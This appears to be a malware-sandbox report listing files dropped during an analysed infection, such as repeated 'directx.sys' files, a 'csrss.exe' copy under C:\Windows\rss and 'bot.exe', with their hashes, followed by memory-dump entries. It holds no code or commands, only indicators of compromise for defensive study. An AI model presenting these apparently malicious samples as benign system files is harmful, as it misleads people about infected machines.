C:\Windows\directx.sys

Filesize
56B

MD5
5b1000a7b605d406e3f72f0a88532dbb

SHA1
67d50b53e3000e35633a6aaad1ae4fc2af12c3f4

SHA256
81acf14c6df1734c06c401c2aa7b68474da975c089a351c8d637196c88b00e47

SHA512
579e8fb90744367e36ac2ec27abaf9ee91c6ebfcb5c2a1d971881a133a3fdd7d3bf4daed076edb041fbab42e053eb360d2ecddacc2544553e9a0b9128184bb50

Download Submit
C:\Windows\directx.sys

Filesize
61B

MD5
7179d586cc03bbb6441f2a5a45f538a2

SHA1
1555579c2786ce1a24008243765339b2bf9bd189

SHA256
d6f514bd9c8f2f7c8dc4a63975fc62058f60f9d3fed69ad03f3fc4aa35a88164

SHA512
fdc7bb437b425a5619ef23ac8c309ec705079fd8b73671577f2964010553bb25d992abef062a7ae6a7bf6dcaac9884845269364dc46123571e8297d736909367

Download Submit
C:\Windows\directx.sys

Filesize
59B

MD5
76b76d5598beffef2572283e1e366b49

SHA1
a55e7b642da70c09b7fcb06fb853ece330aafbbd

SHA256
bb330bc80520f8bdc4bb94f3a5a2076691e5db327aaa5aa49f9e8009fb9279f0

SHA512
ee221129e0b8b2895253026009c3ff8540570934a95f87b62039cfe5944b21eab288be3168af080ec6e06d7468d47801f129d39f97052e3119166372dc91d5ee

Download Submit
C:\Windows\directx.sys

Filesize
79B

MD5
045eba27490e2caeaceb46c3a6d0bf2f

SHA1
5597901c4c7611dfb7942d52d682f813b4a79de2

SHA256
6b03549bb3180e6c5bdf7d75b2d58ceca6478db9ef086044b91121f39aab372f

SHA512
4e018e7609c1a6072559267d2c800d6f8505051023540db34a7e9eae11cae5462bac7f36b6f5766fafe3f59f79614124fbe91f0137f7b597aca75ded5ba5f72a

Download Submit
C:\Windows\directx.sys

Filesize
79B

MD5
87065d78bd7906126f89fa4331aad02e

SHA1
95a9f1d6ebb2adbefa57df7874ccf0437a63c1c3

SHA256
6628916eb67f723f94523d7b7bf291970d8ad7bf2e97ac6137c1a1e896987176

SHA512
758556f94c25e51ff903ff4eb66ba13011b0875df11d7cf354ed599742c529b91754c1b4dfeece2111f5d3533df2c60227a55872495a05b8ca58caba12c5ea7c

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
81dd88faabf15744f002934ec06c5ee2

SHA1
25036a5b15be5c493d988d665c0e102b0fb0aa2d

SHA256
2c8cfa4b6562e9c48baa4404e81716ea3b35b9bda541ace593951a18abcc7ed6

SHA512
090df16bc3780505eb695150e25337390cc475eaf5c9b77e68920d21ff327d23075b53522f67f45c3e691cdbfb8631f92502269beb922965b3a648a8afe1172a

Download Submit
C:\Windows\directx.sys

Filesize
56B

MD5
4915a9d7ae37a3c9866f54fc0d73894c

SHA1
6f571fcf4c10d2b906e7971e4a62ed9e28dd56c2

SHA256
3475aa8263d7765057865cd6c4867fb469c6eeaec8595aad2a3debef1886bad0

SHA512
61f5cadad1d3a79226f319c1b7132ba0c1e156d1967eb79022c9f4c7196bc6d1ad1dd6aa88caec4b279178586e43b9fdf2f2d012eca66fd945b109137725ac26

Download Submit
C:\Windows\directx.sys

Filesize
60B

MD5
6522815a7f1c665371d9aa0e68e8007f

SHA1
2575c9e12bdb2066fc069a80e49a50b06e9ee1f7

SHA256
1092f321f49b4aa29d8891ab476b30a40cb79441ad6cc8e43add03a94e4c9c14

SHA512
a18f4b8412c0c6dec0d313a58486c163082e212ab8c18a2b649432832ed0b629246a53854903bfed800a97852807586e8e3769a0f8451c0967252fdb16206178

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
9c0ae9b921c222b2d787daf686768066

SHA1
f9ad14b1dd0aebcd832d60b1bfb2cd3020382190

SHA256
9e823fc3a0adb246020d9455dd3ecdbf0df3d2f2bb7e90a1fde2482cfa22da8d

SHA512
3fc16b47e3a344d0aea4566c52f829c420b5f317b61841a8fd23930b544ebe3c11790c31b55b15251ecbddb73c818584204ff1999aa37b2e0443ee8a3b55cde4

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
93f5b87bcee87eafb0fac81b058e6001

SHA1
d6edb4636a6bb3782d300678bcdfa95f9f3a46cf

SHA256
2ee8fdab3c5d00103c089e843c154ae991f4626c2ec7732d605db90e36f0da91

SHA512
e55f5ab47449da3270a98e0a335d626f4670e5a4d30c91353c110c3781e63bc439d980dfcfa90686781558a2853f0efb20c71d9e9977ce5e6818bf51b41873a6

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
435f025012c164aa0d3507f836606966

SHA1
43dfdcbe1b6e08316027ce4ba57af8d24ada65fa

SHA256
79931c69dc015c52ed707edff03bbe685df7aae311664b84e3b72546b868673f

SHA512
cbed339bc89c36420a90e3dee4dfe1a0b417e6200389aa9f58871e2160e1d175e0afab0a5b89695675ad92dff4f0af437aabc8f19822b73bd5a5a24d9a4110b9

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
ff238e2d10c1e4c9b74c28a267ef0f93

SHA1
5d1a5947c394718db5fdffdecb03984bb3e52e2f

SHA256
e326296f0149cb973bfb93b3f9bcc001af966dc2c177e8d09475935e5cd4baae

SHA512
e2cde354e04ff1d2e31161eab57e7c02a39cead2ec2bbccda03ba50039b0313d63f5a65694a3402f22e743df36331cfe5bee6b0d7f1ad3a5e0c6a6bc1ba12876

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
ae2213542bb3b40a6ce0905818b96e43

SHA1
7946cb216c3226f88bcccb38780bcb11d1e03f58

SHA256
0e16e94694461a0148f19d7db654c04883f3f2e1c3621ae824ca18dad3b56b10

SHA512
65a76136bf594601dbcd33e9a28f8b8f7e2e41eb89d896b489d7f5fe0e2c5a8ee4400097a58b63e0706f23f5405f2ec9242233bc91c5f6502730485cc6626a11

Download Submit
C:\Windows\directx.sys

Filesize
58B

MD5
d464ee49f696cebef9c3ee575cd9537f

SHA1
6290ec1047c65beeab43dfcabeaf8f9c94c46c0f

SHA256
1f8a21907ce4244a06b215814c21c705a9d17ffe206af2f99184551d9c542a45

SHA512
bd3e7e9bee128a6dc51b84953b49f91ac8ee8daabfca6e69ad4d06fc5050b86970dd9a185998741915e81a3029d5dc155fd095d8701279733121f6e38ebc4953

Download Submit
C:\Windows\directx.sys

Filesize
180B

MD5
d588ce2c86597e0863627c2ea5a194c6

SHA1
981a0b8a558c736acdfb80a300ee4d4f384bdb63

SHA256
58538c12a10e4ea4dde41f4374e26f72090c5295b29a82ee6259633dffe8b7d2

SHA512
b433cdbf964b62233a376cbf5bebbb8b12a97731defd76d7c91f90f2a6d16fe888db75e98e806e0fb1e26e9c944ff097780b376010c6f207b53275ead29e9778

Download Submit
C:\Windows\directx.sys

Filesize
59B

MD5
90b63a4461253b2d14168bcf857cf188

SHA1
082998baa31fd9af448efd19799f9415f8d8be17

SHA256
96732f4969cbc6b27f2e66c6445722e6dcabaa086fdb73523f833ced5c89ba80

SHA512
c09b452d866ae7468af54b38b566ac76df4c0f186f15342832a52139dc7ab857e10a078e6250b1b1983f935f23ca231b6a9edf4e67eea7d80f2c39a2f93b8f8c

Download Submit
C:\Windows\directx.sys

Filesize
59B

MD5
e47cb6fe7c1cc80de72b58ed077e6e06

SHA1
6400257b9bbffeb37eef0b96703d535f9f858d84

SHA256
93c47698257bb1e3602fae5e48691fc0d879f9d815ffa2ab1ae85e0b3e5312d7

SHA512
3221590df50888d04d634f4d7f81a835630b2f447eb229d2307cd23e8d23a061c1bcdb5fb377ae8efeec1dc16bb239bcc21dbaaa507a4b43310205a73b2e6bd3

Download Submit
C:\Windows\directx.sys

Filesize
58B

MD5
cda18c1c03e519720dcef78aa9971fca

SHA1
f1d50737adb86337bfc9cb15d9152a8d5d747320

SHA256
cb66d884dd3c5aa71a32a5f23820ee10981a64d3b9fbefcce47595dbb8533e4b

SHA512
833d87815db1a0986740a6b66826f060cee294d40c568ee9df86bf03b00e2f0ff1b52d876159b4a8bcc48ef9afd05c63a0af064c5af8f296fdff2149e52f1eb6

Download Submit
C:\Windows\directx.sys

Filesize
60B

MD5
df5c45eb0a403bf3f7ac9df29311a465

SHA1
6f3eadfcbe50dcd6d7be430eadd2449b32ddcbb6

SHA256
c0d8af9b3b86833e9b5bf82eb91bd0be382dc3008a563611757448b739d222d0

SHA512
ab303af2f563e1cc7b3d8e711c5734f8fde9c9d8eef9af78a0ac02b6b0758df9ff454e3fe598004b6bd7186a02bbc5a3ecb5fe1efdffddffe98aa8793f0f6571

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
7ed89cdf45b75bcd7355da3302ea1adf

SHA1
97b63cc5650012594c2a317e192c811d79120055

SHA256
86b857aeaf900d2d3e33651485093b8e452b1896393bcf8d2f5995e47ea2bfed

SHA512
50695dcb6462d162487477db052c118a28299b850063d57bcb69c48af3aff3b8d6fda681d06fab53bb17ae6268e9cb6e89eb1f360601abce854a995f41a5f36f

Download Submit
C:\Windows\directx.sys

Filesize
59B

MD5
9d878ffeb16c4821cbc3040c4fe135b9

SHA1
63f03fab7c93f57b7d8678445fd06e33334720da

SHA256
2a088cf78bc59003f83cd570e3a0b44ad738f5575be9d6285ba19c9b94979d9a

SHA512
838be9faaf1e4075647936e59c8a12709182b33b125327e9a8a93d343985f06df6dc8bdb49c1ac4f607d0350cb353d4cee89dd6e2b8fd9cb701cc3187cdde03a

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
befefadc665f60ba657d366d4a3f497b

SHA1
458d9d52a4e39842dd696d2623c9bab6d8334c1f

SHA256
0bc8d10795bc6b6d5c32fbff4bb63588815cf3cf46da7bbc5cc04c5b0ed167e3

SHA512
7f438ce1c76422c922707473bced5496b1abf6dd989f7c68fce6c6df19b9946ba6b3974899a4ff2c9a83f1af9c10f53ae8f141c6eff37824d78708a4543255dd

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
402aed1e86c4e37c8e94ef0e684ad799

SHA1
b6d47a58deaeb81ef3949ced3ff288a4d4838239

SHA256
3dcc369add81c7291c96b901e2433257165b36fff615e2d4f958b7e7d2f164a4

SHA512
050db4b180bc3f5ecf72af8b59f592176ff1df1ea6b09166a4b83b1db4c121849275935f61b2bbb623c2f68bdef1756902715dcede3e8db9380fd39636a010eb

Download Submit
C:\Windows\directx.sys

Filesize
60B

MD5
aeed688dbf377479eed916b88456ccd6

SHA1
511551b15eb729f2dfc3880dfdc9aedbd99f728c

SHA256
3b17f0e2dcdd4101273da878cb26d928c19b9cc00796aaa027c5e0e682b3b183

SHA512
2d3435d6faf0fd0d2bca4a5c7b15a93791b5345823231c050bccf43ffc3b8b6da9aa0953dbf584cc5cf69737436bcff4b7a5e734c41be3d11be152376b683fdc

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
e590abf6964668420ad8e7399ec1ab37

SHA1
4834a914297c247943b568c97c24f6156f5d1038

SHA256
ecc0750b2f0df2ba3f10ba90b6d6f7da56d032ad2f8ea5aea65cb1454e4e07d8

SHA512
eda5970ee739d2f8ce71edfede5a1d7f79a56da9df8e2136c1273aeebb8e8de4fe13f0a3c66e91ae0eb43981d2d298aa8437a90bfd1c69c4807c67835fcb39fa

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
06cab11ee030da1407de0e97b3de3bf9

SHA1
9cd0e115c611e449523d8f57be7338ae7f5ae745

SHA256
749867b4c3e9633ccb76c2322be55257a26e7b6b90a27f857bc708a89ed9ed19

SHA512
926f8af028254d401ac32c5eeceddd2143ca6ab975026770370bc18db3d50e57ee93b734989f71c1d588968386f69f9dc15360f76632e5ab97387043d19cf45a

Download Submit
C:\Windows\directx.sys

Filesize
61B

MD5
77344de4d46a6f497ce3ed590876999d

SHA1
8a5bfe8573c7cb8fe6420f09bc3266fdb37e1178

SHA256
919f0c9536aca98e8f38b469f5222a9e146aa6f1193b69741dec50e4b257c27b

SHA512
10c65625e1a1a65bac033136aa1e5020bdf6a1ae744603033b25bf2fbc36f53b1385e1aaed3f1bfc130fb6a776366fbedeee5cf9c2e62866b00a3f3dcdf83724

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
56c38fa8be9835abd11c88289022993f

SHA1
fee23c06e6bade654ca908ecbddf7f5078abfddf

SHA256
373addc81477c4554955498da786fcd668b82dea4cddcb723790631e0fd6db84

SHA512
d9c9982a6a3e90d0578e86dbd06c544ae9a96883af6ad6f435558dadd20590567847a4337fa09999f5f08c2a819d21ea7ec997cc3f665f258bfb3c0e2ff8aacc

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
e4f54ed061333f7966db2335450e7d34

SHA1
e988f4f1cd0477e50cc0be91eb5524933c588c89

SHA256
598b34f33ad01f05fe707664888f0975da9ca9d8d11d762638fe3aac906741c4

SHA512
a60c388b3f5c14343873e0d7f90ef240a64273044a05eccf7a3c9b89c229195abc8bdb65ac635e354996667e19c7e662d81f56d0ccbbc35a27327edf12b5a88f

Download Submit
C:\Windows\directx.sys

Filesize
103B

MD5
38d423ee8133aad558e759fc318a57b5

SHA1
4ac668bb490707d87a02958bd6025c4a38fb6ed4

SHA256
efaf955934f81727d9ccab9f92756bdc1c1dcd73c060483b643f8721b0c705c1

SHA512
aa3d5c6fedb7e64b231ea4a1a0bb4905cf44d1a50e4230775d8b6aeff7ab524bf620716d386d7c873bcc3674e2b3c75107f9305d4830e7e05ead1d3a4f5edfbc

Download Submit
C:\Windows\directx.sys

Filesize
165B

MD5
5b1c1427e5c9700d003f598bbe82a987

SHA1
ebdd5a4f03902318469f1fd4428d7be4b5335905

SHA256
7013267eb573fba33b9425e538d956d33f48cbc474b4727748e29c08ad77ee06

SHA512
6222da8968a5e66b6a00578eee118e05f709bde8d552d0876ed536e7b10575da1e641b4c92aa0be388282d15f45d363faff1e29d5313e905963750d4402be58c

Download Submit
C:\Windows\directx.sys

Filesize
163B

MD5
06a87631c65f4236d9ab7cc1fcf837b0

SHA1
9c11a557871c690ddbec3773a9126751e94e1f00

SHA256
b32cc2a99b9e168175f1463a9d868a01502e293794d6cd9df3d7e9715687e6a2

SHA512
a63f45611bfb13cf4e05956526c1f653c76ae60b022e1ab4c101a68e4756ed075bac136be86ffdaf7e97e157a70d1dfab78f3dbfa26ad42c20cf5019e52ed1b2

Download Submit
C:\Windows\directx.sys

Filesize
165B

MD5
0dac88019997698e9e6702c602888f19

SHA1
c3f16c4a20ff597ba3e08c2b788892629e14b3f2

SHA256
da5618c5b24f0c0badcc846b9e61fd9c778e1231f10613ac73b908309823efa2

SHA512
c4980518c30766d2f137cec1f88c5050b73d80b8373555d03afe9658ebe8f95cc40dd1bfa7080e6f2a8caedb3cdfe2e5c8cdff0858dc73ec29832cb65bbced58

Download Submit
C:\Windows\directx.sys

Filesize
162B

MD5
f63d802ade01a500746f6d34f4282d61

SHA1
b32b5e97054d4ada6e9443055a2f3a2285c40551

SHA256
7f39be262dff90cb8ba6b08a823a102802944f4ee0996adb1715c013ee71c1ca

SHA512
8a96d9bc3ceb5366b15b9e4d1b6c835b8a30f3d006893fe8385acec5386f2c8964fcc4a92e8dbc6288b0d48e2736678010e03a614fb15af508380208b86e3414

Download Submit
C:\Windows\directx.sys

Filesize
132B

MD5
8bfdb6072d09879c00e169f4341d1233

SHA1
647521f1e2202f089bf3f9fca552430aec47d3f5

SHA256
0d1dcc50e39cfaef20b0b750b73ee493da400fec33fab89740a5052b22cb117f

SHA512
d148f8c33213205a86e7b55423e369da4d404dd79977b801ba6e3b5a542f2ebeff61e0b99e44cda434ea310736d3d87fb6def0ad2b071beb0723b7eba4c03778

Download Submit
C:\Windows\directx.sys

Filesize
165B

MD5
e59697cfc678f2a35ab8fde3a13c9de9

SHA1
335c87c01e1245cc88d0639dda063351f627c3aa

SHA256
ae76ff8b303be1a2b9342b6a7ab43644b4298c910ed3ea1f0b345b8edf2a6a35

SHA512
9f679cbc80aeafdc29f61d4c2770e66ca193fd62aa232f6cfbe05855d8f620c68fce7ed88496df96ce9c8af99a56dc090055aeac4a1bc2018e76287950afebdb

Download Submit
C:\Windows\directx.sys

Filesize
182B

MD5
5db2c953fec9a7a42da3952ff78b793c

SHA1
aa689de4cce671a523ca4136e1684ceee8a4ff37

SHA256
d831d5992f13cda83b9291eba31dbb7d9ef05b90184a0fe9fa882b7a6d1248e8

SHA512
ebae391463802033acb8f37ccb1b8504f7cc91071dff012ff5d7f990025d8ad38b3233b2088bc0377fdfc270dfc9d154d622668adc94ab55aa7a5ef27809da2f

Download Submit
C:\Windows\directx.sys

Filesize
182B

MD5
869f52ad0676ba2c156bb05c53911fca

SHA1
dc7787bafde4640f902b604d9143e69e96a9b473

SHA256
d163ceee09370ea767a2a65fa007d67dbb43cf10444877f9a16396f0b354ca07

SHA512
8ee90c5290aa3675c97f41ff697c09cfea5b880a2a99cf92d8ac0d0c8d96a0c5edba8ee85e1436dbe5fc066fa3d7f8619ab6558d4a523163291752cfdd250e1c

Download Submit
C:\Windows\directx.sys

Filesize
165B

MD5
5e088205ea0c66793bb81d532b2e665c

SHA1
aaf7c580a15cdab30ac653144c948a5c965ef943

SHA256
b0433a031999534a2c82df0ce76b03db6d47c706c004c7b291df2b66f9e64c87

SHA512
8a8e059d91b567c5ee908b3e86c220f977d79b87fbb20c98bc8a1c0a0515d22f8f3e51284654683327c4cf341157556961aa45862deaae28a19a996673af5ebf

Download Submit
C:\Windows\directx.sys

Filesize
163B

MD5
073ce010941526bc85785c05a19e3251

SHA1
3a05246383228fd6eda021c81faeb1b11fef71bd

SHA256
067f7f5c9750c31a151486019c57a3ab7990f17851470d55179e06ef25911cf8

SHA512
c013cdad25f82410565b443c9be689772f01e97b8fd4d7110516a8a22b5ad70a8f8ae2bb8ea5d07bb4f866ac2c55028764d66acdfe6c8cef8d2d585a0261e9ee

Download Submit
C:\Windows\directx.sys

Filesize
164B

MD5
7f0ecedaffe3738676bab11b220e24cf

SHA1
b82b3a07c95ae06f4933ee95879e4ff082729d15

SHA256
9ae698a35d232a2df0ac9a4992ae6d23f944d5632c328fab9f970c663287b5b4

SHA512
53dba517d5e9ba3f62083e5669078434c4f1a742e121dc5b061f720366f77bf0431f40dcfae6f554d50f3723ea98aeaf6a7ae475931b34b5ed560a1e4ab09075

Download Submit
C:\Windows\directx.sys

Filesize
165B

MD5
7ccac3b7a4aea9e8c44fc573d6952ebe

SHA1
bb6b49ae852167a4adb608eaeaf950ee33a62c2e

SHA256
a4b059ebed9a0c4d48b15c52a0303891f94a7c7ac814c42b56ab371bd7193256

SHA512
ee3726adf2dbeb2b1e9c09f89578fc97e30feab27b1af827217d2c7eb1b9e634ab7f4897f69ab908ef31b0194263fa6c64bffb13f283fe8e20c61ced57bb00e7

Download Submit
C:\Windows\directx.sys

Filesize
161B

MD5
71d113152610799d7009bb5c9d43afa8

SHA1
bf9a266f711cef2b9a5ee4ad47b7800a47543e55

SHA256
570f0c655f20c544efdff32df13c73f629cd09a8243938098a06478f7086f457

SHA512
4ac4a4d9ad118061c234c98bbd923530f1ccd0b2e45207b0228054ffb4e42336e0e4f733901bc37903685668bf02327d117e9dd822df99c45ea6c317d15ceb3e

Download Submit
C:\Windows\directx.sys

Filesize
156B

MD5
80c0618b1578922e313334be029a2c06

SHA1
79bb728b5f47f75c85f06c0a98ef6d690e4421a2

SHA256
c81fa9ec15cb4a0795a79380b7444b11902cf84bb6661517c418b898c000354f

SHA512
6cb0f303ab8394a93f763d64c279e67cdf0774ee9bc9aa2f3747700d0bcb4c75fbfbc4b10beb1319682c86993925c0059375c53821776a59bb89a51709afd278

Download Submit
C:\Windows\directx.sys

Filesize
165B

MD5
36756c0c80d9d52ab7652da3617cd0cb

SHA1
9dbf7941ffd8dff0c2706bceaa00eef55eb7a661

SHA256
9d65264130fe9222983ac2303ebca5ea31aea8dad4aeec5cadccb9e0a32ca5e5

SHA512
4b9f2058fc2ad6118761e5e21353ee7b2cb69e8fb9b4ad806ef9f322682d995021af336cdf57764a47f41e40e5d51e6c2483b9334ec60218c62cac23505f1a40

Download Submit
C:\Windows\directx.sys

Filesize
161B

MD5
f89e28f9760da95d524e7a78f9beb5e1

SHA1
aae65fdda814d88af53d46610f32c3c6bbd29729

SHA256
35b52720f37d77afbe7fa293271c8b0e6e59ee5e1ce22b7dfea6755b7fd4d8a8

SHA512
4f1e5210530f8fbfd4b70d901ddae84f31162b16313344c76b6fa3cd310f3f92a6b0853d2453f2a616ca5c6b2fa0c76b2777e06e00b8d1dfdd485b483a426a5b

Download Submit
C:\Windows\directx.sys

Filesize
165B

MD5
400dd40fdce3518d106e0dd0a6bf3d8e

SHA1
c91d65654d9c6cea975841755d32bda5b4e59ea9

SHA256
20b7266e842a93e709952e7957bc13fc1f7fd59f45978e061b6cf180d63432fb

SHA512
f325aa5c2a280ec81a4db51917316612c801fc2362d7677ff26cdc7278fc5bb5cb766de1570a19275f8947b064c7c1922ed086add7976933860103355c188215

Download Submit
C:\Windows\directx.sys

Filesize
165B

MD5
beb2c11faba51a94682cf4d9cbb72701

SHA1
0366c2e94b53a6cc1dd5bfd7d38bef810665d3f1

SHA256
5fd7363d49f81e97b7328155fb90c55e34c5b312f1328f478ac57839d38f5c76

SHA512
d4b91dc6be02b1778610620a8533e5143e81abda936d793433142b247617c155a00a822d22b4c6ad10ac97c88ee3726cb388e5e561a583632e323a20be153176

Download Submit
C:\Windows\directx.sys

Filesize
150B

MD5
f617b63ba118856cbd07f5ff4b0f712f

SHA1
6296a3b5bd838e589f88573deee9f321d671a3c1

SHA256
cd40b4220a48bcb07d5fb7950cfc08e6e5ea8692ee69a0f4d7e18e59d435f10c

SHA512
222a0914472015305f0efcbcff6f5294f3e0bead4b059e014582213c315941c9a15b25e203ee297a5cba22ceb6420b8fdccbb5cf3b5265622259b77b91101a26

Download Submit
C:\Windows\directx.sys

Filesize
164B

MD5
dfe37b5088e40491ddce7290b91db1ee

SHA1
aca67b7d25299a0c801292bb50aca1a16559dd18

SHA256
bfac207705364384cb687a71be1e3ac9504f6687bb037cf2f17c6a703b0977d9

SHA512
f02f111a3f65f650a4d424fe19d30654142fb4485a38753cf2ead5b5e4a06bf5f640830dd68095f5f8f99fb56ed4c2b467762a3d8aece39d47e213def6f48ca4

Download Submit
C:\Windows\directx.sys

Filesize
165B

MD5
192fe9add4cd97079741ed9fc7bc32c8

SHA1
5954a123c6de9eb2a5c980d8e1a6c3f5cea19166

SHA256
491b03c7a173bf81e80c2e8e7a591f407f23403889ce73335c3910b346ecddcf

SHA512
bb728cb31c78b5a65d139b4070d8a721501b145b8a92e96c285ab9845c5276f86b7bf816da36270a12a0384499a00f40b79005f97fee1fa61207780cb672cff6

Download Submit
C:\Windows\directx.sys

Filesize
160B

MD5
951d622357a69791fc0d20ff8f43247c

SHA1
77449e5f1a3a6b1c84db06f160cc8b3ff4ccdaef

SHA256
d166b06d175a974468d9d45c2cf9cc68f5e2193414ec2d0efff4256f702f3c67

SHA512
dcb4a0881dd8854bca91991089cdb98cbf531f70bd31d6464d02aaff9a6ed02b42619be3fc205c3a85bbf1917cd276f28b86d2de605472257c5a3be0e4f1ce7e

Download Submit
C:\Windows\directx.sys

Filesize
164B

MD5
4cf40d254d2ba8ea8e44a85ad2aab5e8

SHA1
97428627c058cb36aacc198ae7fd6f0579fff85a

SHA256
5ba5bc6967d8363406ff691f04bf72d2a1f26b29464b6a454ade459cdd1cecc2

SHA512
b6dd6713968e3eb3343bb0c0d79c59a8b4b2884917439ab3af69b881034a9d17d7cc1c3e44dafdbbd3a5479fc83002b36ca230b3982cfb00f7f479ab8f27360e

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
4afadd69a89485360aa63c0d17bacc66

SHA1
e5e07b3daef6e72c0e2067b5aa51c2e7b1c4b13b

SHA256
e8c56ab5ac29413d33ef5888db10bd6f71c911014843c9a6c1b9458f1e0ff3b8

SHA512
a169f3221c9f3a6c2598e13dc17a5ceeb3b22b01b4e0b5fc27b5536d343ec1e4bd79270414eb2ce20a09eb241466e5f26fada907edbd9916b37435bf012ff25e

Download Submit
C:\Windows\directx.sys

Filesize
86B

MD5
f885d87964363b63dd02fa0764914e34

SHA1
f4040260ce0513af83c51129835e39fc1dc5b8cd

SHA256
6fe00c54216384322f650a0eee44b055009039ebb425ed0c07c458e32c97740f

SHA512
054af68bcf1bbfe0721fe210d9a56fa5d43bef94107c45c84e34edea6df9d05ea4d7e019a1c25d2e6568d903992164ed12f5e58dc7fb866956e0b41a56f61b1b

Download Submit
C:\Windows\directx.sys

Filesize
24B

MD5
c93ff55f5c5a9e2323b2f5d677bdbee1

SHA1
3e1c36c7d34bafad15e140ce5b03734f6aa87d1d

SHA256
15a9b8e44230a9fef940f579e061c1db4244d2aae8a68f6139227b034e9f28cc

SHA512
8912432056d997f4847afcebbe0dca43e3d8bc249d539ebf937ab77871d797d6f84ff860fbccec6bffab898bf18edb30ea5805e8ed8c63e05a3272b0e512aa3a

Download Submit
C:\Windows\rss\csrss.exe

Filesize
4.1MB

MD5
888a1c86f1f4db39987a66613ea87104

SHA1
82e70e1434c19c9cf84be6ed963009c13a7cd2f7

SHA256
6110c7a02fe334fd3cfda9a7be565b4bd3ce59661fba7b744fec1c5a8d46a229

SHA512
fb083f8ba9924cf739f0f020e1989b777f5b083bbdcff45255628bf798b7269231dcb06b9266cfd2d469f81b9d880730882146cf5c663c15f0b67cabb13c9b33

Download Submit
C:\Windows\winakrosvsa.exe

Filesize
14KB

MD5
2f4ab1a4a57649200550c0906d57bc28

SHA1
94bc52ed3921791630b2a001d9565b8f1bd3bd17

SHA256
baa6149b5b917ea3af1f7c77a65e26a34a191a31a9c79726bd60baf4656701fa

SHA512
ab1a59aa4c48f6c7fcf7950f4a68c3b89a56f266681a5aabd0df947af8340676e209d82ddd1997bfebd972b35ca235233b61231335aec4567f7b031e786ea7e8

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

Filesize
10KB

MD5
2a94f3960c58c6e70826495f76d00b85

SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

Filesize
742KB

MD5
a8b8b90c0cf26514a3882155f72d80bd

SHA1
75679e54563b5e5eacf6c926ac4ead1bcc19344f

SHA256
4fe94f6567af0c38ee6f0f5a05d36286c0607552ea97166a56c4f647e9bf2452

SHA512
88708b20357f1d46957d56d80ac10479cffad72d6bb0268383d360e8904f341c01542b9bbe121b024ef6d6850a1ea4494e077ff124bc9201ae141c46ab1359a4

Download Submit
\Users\Admin\AppData\Local\Temp\is-GM0HS.tmp\x2s443bc.cs1.tmp

Filesize
3.0MB

MD5
0d5dc73779288fd019d9102766b0c7de

SHA1
d9f6ea89d4ba4119e92f892541719c8b5108f75f

SHA256
0a3d1d00bfdbded550d21df30275be9bca83fb74ca3b2aabd4b0886a5d7cc289

SHA512
b6b1cf77bcb9a2ad4faa08a33f54b16b09f956fa8a47e27587ad2b791a44dc0bd1b11704c3756104c6717abcaffc8dd9260e827eccd61551b79fcedd5210fe61

Download Submit
\Users\Admin\AppData\Local\Temp\is-UKQCJ.tmp\ska2pwej.aeh.tmp

Filesize
2.5MB

MD5
62e5dbc52010c304c82ada0ac564eff9

SHA1
d911cb02fdaf79e7c35b863699d21ee7a0514116

SHA256
bd54ad7a25594dc823572d9b23a3490ff6b8b1742a75e368d110421ab08909b2

SHA512
b5d863ea38816c18f7778ef12ea4168ceb0dae67704c0d1d4a60b0237ca6e758c1dfc5c28d4fc9679b0159de25e56d5dfff8addacd7a9c52572674d90c424946

Download Submit
\Users\Admin\Desktop\1.exe

Filesize
89KB

MD5
69a5fc20b7864e6cf84d0383779877a5

SHA1
6c31649e2dc18a9432b19e52ce7bf2014959be88

SHA256
4fe08cc381f8f4ea6e3d8e34fddf094193ccbbcc1cae7217f0233893b9c566a2

SHA512
f19f3221a26bdab7ddcf18196ef6e6012968c675065c4e56f54faaace18321c07771fdbdacabd365159ccc5bf01e40693146709217e13dcd282609242e61a4bc

Download Submit
memory/860-580-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/860-258-0x0000000000400000-0x000000000068E000-memory.dmp

Filesize
2.6MB

Download
memory/860-171-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1128-1015-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/1272-1565-0x000000002FB71000-0x000000002FB72000-memory.dmp

Filesize
4KB

Download
memory/1272-2049-0x0000000006530000-0x0000000006630000-memory.dmp

Filesize
1024KB

Download
memory/1272-1685-0x00000000699FD000-0x0000000069A08000-memory.dmp

Filesize
44KB

Download
memory/1272-1647-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1364-212-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/1364-128-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/1364-170-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/1420-1108-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1420-1016-0x0000000000220000-0x000000000024F000-memory.dmp

Filesize
188KB

Download
memory/1424-1111-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1664-1177-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
memory/1664-179-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/1664-381-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
